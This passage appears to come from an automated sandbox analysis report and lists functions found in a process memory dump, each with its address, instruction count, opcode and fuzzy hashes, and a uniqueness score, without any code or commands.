                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                      • Instruction ID: 2fa27cd013e868218430880c8b4b455498c8c0bc48b1d953d02f13cf7e42154f
                                                                      • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                      • Instruction Fuzzy Hash: 483128323206426FDB66876CCA45F7ABFE9EBC5650F184058E685CB782DA74DC41C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0129EA55, Relevance: .1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                      • Instruction ID: 75bfa95afed64dc9bf2f0fa2ac259e8e38378a9647233c6719134e7034a1894b
                                                                      • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                      • Instruction Fuzzy Hash: 6E31D2726147069BCB29DF28C890A6BB7A9FFC0210F05492DF65287681EF35E805CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012569A6, Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fc37a94779efc9a6400b6850628ee799453427f6ee5ee96eafa239d2ce329f52
                                                                      • Instruction ID: 7e816dda45d6d773c8c73163f2a41acc8cebc3b62e689ed1a35d7cc95f6e5ed9
                                                                      • Opcode Fuzzy Hash: fc37a94779efc9a6400b6850628ee799453427f6ee5ee96eafa239d2ce329f52
                                                                      • Instruction Fuzzy Hash: 24419FB1D10209AFDB24CFA9D880BFEBBF5EF48714F04812AEA14A3240EB709905CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011D5210, Relevance: .1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4e85015d010f3a46e9a019c730506a8679a5f34e523c82bd667ddde99d98d98
                                                                      • Instruction ID: e2cdd202e837fe328c8795991b242336bd5a3fa5b8336b28bf613749773ceb00
                                                                      • Opcode Fuzzy Hash: a4e85015d010f3a46e9a019c730506a8679a5f34e523c82bd667ddde99d98d98
                                                                      • Instruction Fuzzy Hash: 5A3124316A1A06EBCB2A9B18C885B6A77F6FF60760F114619F6150B1A4DB60F804CAA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01213D43, Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ccb2e760ab20d7d17496ce34a72132e5a4018786e1b534358640050efa3af39
                                                                      • Instruction ID: 23df5d28c216e62e9033f0691490b8cadeb6cb09af5f73f01a3e7fa000efcebc
                                                                      • Opcode Fuzzy Hash: 6ccb2e760ab20d7d17496ce34a72132e5a4018786e1b534358640050efa3af39
                                                                      • Instruction Fuzzy Hash: F031D031A20612DBD729CF2DC842A7BBBE6FF65720705806EEA45CB354E774D841C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120A61C, Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8216313a26c03a014883d4e9d43808b8730806b792799283a06fa7526d631acd
                                                                      • Instruction ID: 8e9d270653eda9ede3f6b7610b30055271b8907a17662d878aeabcb7c8be850c
                                                                      • Opcode Fuzzy Hash: 8216313a26c03a014883d4e9d43808b8730806b792799283a06fa7526d631acd
                                                                      • Instruction Fuzzy Hash: EB416A75A20305DFCF19CF58C880BAEBBF1BB99304F1482A9EA05AB395D774A941CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011FC182, Relevance: .1, Instructions: 104COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                      • Instruction ID: 8cf596c770cf5326fd0e2d89cbc84a235fd7d10480854b0b705ff57f506ab0be
                                                                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                      • Instruction Fuzzy Hash: 30311472A0594FEED70DEBB4C480BE9FBA4BFA2208F04415ED61C47241DB346A16DBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01257016, Relevance: .1, Instructions: 104COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 851a4d4b147ecf4c20e9d47f17b782774d955cc094d881f927230ad23548d8ee
                                                                      • Instruction ID: 1481da345d9b7a0ceb1102578f52dea3a327b4415d3ba371ad8778b72d95a0b9
                                                                      • Opcode Fuzzy Hash: 851a4d4b147ecf4c20e9d47f17b782774d955cc094d881f927230ad23548d8ee
                                                                      • Instruction Fuzzy Hash: 7331C4726147529FC320DF28C880A6AB7E9BFD8700F444A2DFE9597690E730E904C7A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120A70E, Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e54a64076186472c09fafca37d5ef7730f003322f17cb6ed56c610b05cdd261d
                                                                      • Instruction ID: 04036d52b5aaf3e309982347aabc9ebe17242759e79835c118580713449e47c6
                                                                      • Opcode Fuzzy Hash: e54a64076186472c09fafca37d5ef7730f003322f17cb6ed56c610b05cdd261d
                                                                      • Instruction Fuzzy Hash: 0F31E4B16202019FC726CF08EC84F69BBF9FB84710F544A59E316C7284E3B0A901CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012061A0, Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bc1083dc2ef0297580c2ac3fe1fcb31cac4bd4430910d323036bd02b54fb1686
                                                                      • Instruction ID: e31c6c0496e0474c5af6e32b6cabc24e82f9330c14845e3292512b0419df04cd
                                                                      • Opcode Fuzzy Hash: bc1083dc2ef0297580c2ac3fe1fcb31cac4bd4430910d323036bd02b54fb1686
                                                                      • Instruction Fuzzy Hash: 5B318F716257028FE325CF1DC840B26FBE5FB88B00F05496DEA949B392E7B0D844CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011DAA16, Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fc564c998b5c9fd6b878b7fa92cafbfe1ccd5acb5ff0cb17abf6baaee4fc77e7
                                                                      • Instruction ID: 62eba6b56568261a71d9a525f8c7fc612d7a717c9d6d0cc57a135cae683b11e0
                                                                      • Opcode Fuzzy Hash: fc564c998b5c9fd6b878b7fa92cafbfe1ccd5acb5ff0cb17abf6baaee4fc77e7
                                                                      • Instruction Fuzzy Hash: BB31E571A1051AABCF15EF68CD81ABFB7B8FF54700F054169FA01D7150E7349911CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01214A2C, Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 43367f13c3e91d68678a9941eb9fdeef37bae827a7666e2e4bd466f9b040def0
                                                                      • Instruction ID: d6d03e60897a420bfea051f5c1cea0d02a5d07d4140dfb784e4402706322ed33
                                                                      • Opcode Fuzzy Hash: 43367f13c3e91d68678a9941eb9fdeef37bae827a7666e2e4bd466f9b040def0
                                                                      • Instruction Fuzzy Hash: FA31F5332216929FC721EF58C94572ABBE4FBD0B14F11452DEA5A07249CBB0D801CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01218EC7, Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c821f37b13c0bcd648c1260545447a70ce368c2c224d6888a80abaca980babc2
                                                                      • Instruction ID: 8572d90d43656c50c318bb381e58939339da0e7b3e6ddeb3157f474d3bfb8dab
                                                                      • Opcode Fuzzy Hash: c821f37b13c0bcd648c1260545447a70ce368c2c224d6888a80abaca980babc2
                                                                      • Instruction Fuzzy Hash: F241B5B1D103589FDB20CFAAD981AADFBF4FB48710F5041AEE609A7244D7749A44CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120E730, Relevance: .1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93cc11ce72b327f9e2407b037207d980e43f2a3d85983e12bf08aafc57cb105d
                                                                      • Instruction ID: 10374de3f9f549fe207f2835fa1015fb2512c9188fad8540e1d96fb11c9959ac
                                                                      • Opcode Fuzzy Hash: 93cc11ce72b327f9e2407b037207d980e43f2a3d85983e12bf08aafc57cb105d
                                                                      • Instruction Fuzzy Hash: BE31CE75A24249EFD749CF18D841F9ABBE8FB08314F158656FA04CB392D671ED80CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120BC2C, Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a1e48ebfe49b721c1ec606210c2cc24809db5fe6f21a00ecc0682eba20032e54
                                                                      • Instruction ID: 59fddcedca34aa59b9e2b15cbb68047fe1e4c0cefaaafdb1868cd4738d819eaa
                                                                      • Opcode Fuzzy Hash: a1e48ebfe49b721c1ec606210c2cc24809db5fe6f21a00ecc0682eba20032e54
                                                                      • Instruction Fuzzy Hash: C231033AA206069FCB22DF58D4807A673B4FB28311F040279EE05EB386E775D9058BC1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011D9100, Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 392dac88ffb2a1a1bbf89f094c714399e1795b9195662859cb5b752b0d3a8903
                                                                      • Instruction ID: 8bc9aa9181c2e4c1f5785198b5c52a804593298b1e4b004b93f7a85adf448df4
                                                                      • Opcode Fuzzy Hash: 392dac88ffb2a1a1bbf89f094c714399e1795b9195662859cb5b752b0d3a8903
                                                                      • Instruction Fuzzy Hash: AC31B475A1164ADFDB2EDF7CC4887ACBBF1BB98328F29824DC61567241C334A980CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01201DB5, Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                      • Instruction ID: ea76d54910a4d8f1b95bbe7c70267071af87ce8cff91573dbf69cea411831119
                                                                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                      • Instruction Fuzzy Hash: 6521BF7262020AEFD726CF99CC80EAFBBB9EF85744F104165EA0197251D270EE51C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011F0050, Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ec363753968315a96af7cd4cd0a899448003d2694765a95643917dab941e77f2
                                                                      • Instruction ID: e4c9df1150d8a4599b8b4db6f10c03464f1a0804d8a276159dffce450ce78fbc
                                                                      • Opcode Fuzzy Hash: ec363753968315a96af7cd4cd0a899448003d2694765a95643917dab941e77f2
                                                                      • Instruction Fuzzy Hash: 9E31C131211B04CFD72ACF28C844B6AB3E6FF88754F14456DE69A87791DB75AC01CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01256C0A, Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 35cd31bf205c8db53c3a18814c65c8accf34c5eab39dff5599debbfe66e0d0a6
                                                                      • Instruction ID: c7b6282246205716c1200d531e90749e64542751b11b20ccb765c2d51be2994a
                                                                      • Opcode Fuzzy Hash: 35cd31bf205c8db53c3a18814c65c8accf34c5eab39dff5599debbfe66e0d0a6
                                                                      • Instruction Fuzzy Hash: 6521AB72A10645AFD715DB68D884E6AB7B8FF48704F140069FA08C7791E734ED10CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012190AF, Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                      • Instruction ID: 9506355b587f1e47103fd64c7cb8d861755fed96468ca97e797eb83c5819a689
                                                                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                      • Instruction Fuzzy Hash: 02219571A10205EFDF21DF59C484E6AFBF8EB64314F14886EEA4597241D370ED94CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01203B7A, Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a31f9fc01147331bab122a490f25bba41ee751f417b2e5b27708de2d6f1f99cb
                                                                      • Instruction ID: 0b65a3af06ebfb798ad26dc069951d3ff63e44cf91a194a3fba335a8a452d6ff
                                                                      • Opcode Fuzzy Hash: a31f9fc01147331bab122a490f25bba41ee751f417b2e5b27708de2d6f1f99cb
                                                                      • Instruction Fuzzy Hash: 4321D172A10509AFC715DF58DD81F6ABBBDFB40318F150168EA08EB252D371ED01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01256CF0, Relevance: .1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95cb7ddbd390a0163a18d5887b12f0bdaeace9212d8f4653384213a67227ff7d
                                                                      • Instruction ID: a7ecdc6762ae8496ad80e3bff436c264be9bcba01787f180deea6976f26754c0
                                                                      • Opcode Fuzzy Hash: 95cb7ddbd390a0163a18d5887b12f0bdaeace9212d8f4653384213a67227ff7d
                                                                      • Instruction Fuzzy Hash: 142107725113469FD711DF28C984B6BBBECEF91644F44095AFF40C7291E734C548C6A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012A070D, Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                      • Instruction ID: 46db4ae14af8ddc5f8e373094ae2bb6462b5edb3a0c9d2fb6ef9da44a23d7526
                                                                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                      • Instruction Fuzzy Hash: 8E21DE36214201AFD719DF28CC80A6ABBA5EBD4350F048669FA958B385DB30D919CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01257794, Relevance: .1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06256c3694137553072cc897697c425264606e9ac470537b62165da683b61ad1
                                                                      • Instruction ID: d5210337c8e22145475f90b550b063111bac7fb14f589513841a25520732e9e9
                                                                      • Opcode Fuzzy Hash: 06256c3694137553072cc897697c425264606e9ac470537b62165da683b61ad1
                                                                      • Instruction Fuzzy Hash: 45219F72550605ABC725DF69D894E6BBBA9EF48340F10056DEA0AC7750E634E900CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011FAE73, Relevance: .1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                      • Instruction ID: 44598f95ebfbe7c08a51666302f420471efdf0d914408bfba12d3f588c601471
                                                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                      • Instruction Fuzzy Hash: 7D21D432611692DFE71EDF2AE944B257BE8EF44240F0A00A4EF088B793D778DC40C6A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120FD9B, Relevance: .1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                      • Instruction ID: 63e21f60429fb7c847689604c12c97c3c3e2f8aa53e8324c41279c9b4c531598
                                                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                      • Instruction Fuzzy Hash: FB2180716A0A41DFD736CF4DC640E66F7E5EB94B10F25867EEA4587662D7309D00CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120B390, Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 37006615917db92caafceda7d3e6351850ccd882b8605dbb228bf0fb00a66c73
                                                                      • Instruction ID: eeb2941ac8ed605d107ab846d824fe091035908320dd10732a7f6eaebf422a8d
                                                                      • Opcode Fuzzy Hash: 37006615917db92caafceda7d3e6351850ccd882b8605dbb228bf0fb00a66c73
                                                                      • Instruction Fuzzy Hash: AC1125363351219FCB2A8B189D81A6B7756EBC5630B34422DEE16873C1DA71AC02C6D4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011D9240, Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 5d02eebb569f691afb64cbb476ab576d321ad06e140654f52624a8d75bb1bbdb
                                                                      • Instruction ID: 4bc679e103dafeff29502b73015c24f05c48e4bf36890b7e5888af9474be0529
                                                                      • Opcode Fuzzy Hash: 5d02eebb569f691afb64cbb476ab576d321ad06e140654f52624a8d75bb1bbdb
                                                                      • Instruction Fuzzy Hash: A4215E31051A01EFC72AEF68CA44F5AB7F9FF28708F14456CE249976A2CB35E941CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01264257, Relevance: .1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b876b67bc28cb45b5d7d83831dbef0416ca3275de44070fd3fc1361cfc9d8952
                                                                      • Instruction ID: b4320bb2d5d81e2568ba8cc4457e09737904a4ce9af2cfd80961acb9acefd172
                                                                      • Opcode Fuzzy Hash: b876b67bc28cb45b5d7d83831dbef0416ca3275de44070fd3fc1361cfc9d8952
                                                                      • Instruction Fuzzy Hash: 3F216D75521682CFC729EF68E0486247BF5FB45354B20C26EC3858F2D9E731D5A5CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01202397, Relevance: .1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e6f152ebc930fe883925c4e37c53fbf79b9496a431ec176c698f9eb528e2d85
                                                                      • Instruction ID: 23c5857a180e807fcffdf92d155c773175f3374d3f406bfd2010adfc76a0309e
                                                                      • Opcode Fuzzy Hash: 4e6f152ebc930fe883925c4e37c53fbf79b9496a431ec176c698f9eb528e2d85
                                                                      • Instruction Fuzzy Hash: F5112B32724342ABE736A729AC88B25B7D9FB60610F15822BF706A72C2C7B0D8458754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012546A7, Relevance: .1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                      • Instruction ID: fc3210c365c0029bbfd54bf0cba7e1774c107a899926fd680ca9deceeaff21f2
                                                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                      • Instruction Fuzzy Hash: 2B110272514208BFCB059F5C98808BEF7B9EF95314F10806EF94487351DA318D55C3A4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011DC962, Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4ecb2c05f3b5e076dab14c337b31d67d33df96607514369827208cc2075d12c
                                                                      • Instruction ID: 5a1a29c647ee0271e3226d3b18b313ccf4052fb22efeb03841580fb1d5b65d3f
                                                                      • Opcode Fuzzy Hash: b4ecb2c05f3b5e076dab14c337b31d67d33df96607514369827208cc2075d12c
                                                                      • Instruction Fuzzy Hash: 7411E131320A479FC729AF6CDC89A2B77E5BB94614B00062CEA5283651DB60EC14CBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012137F5, Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 58b883bc230e21713019394643524c57ebef3e76dd781dba0972e5e7e41a76ce
                                                                      • Instruction ID: 2fb0008bc33236a82ca0921507f5df02507080fdc53c5be07229ada73664cb19
                                                                      • Opcode Fuzzy Hash: 58b883bc230e21713019394643524c57ebef3e76dd781dba0972e5e7e41a76ce
                                                                      • Instruction Fuzzy Hash: 9301C4B29216129BC337CB1E9940A26BBE7FFA5A70717406DEE498B259D730D801C7C0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120002D, Relevance: .1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                      • Instruction ID: cda53f94dceece241c9232e442a785988d4776ab643c9a08eb1fafc53d373852
                                                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                      • Instruction Fuzzy Hash: DF11A132A356C38FE72BE76CC945B397BD5AB41798F0900A0EF04976D3E769D841C264
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E766D, Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
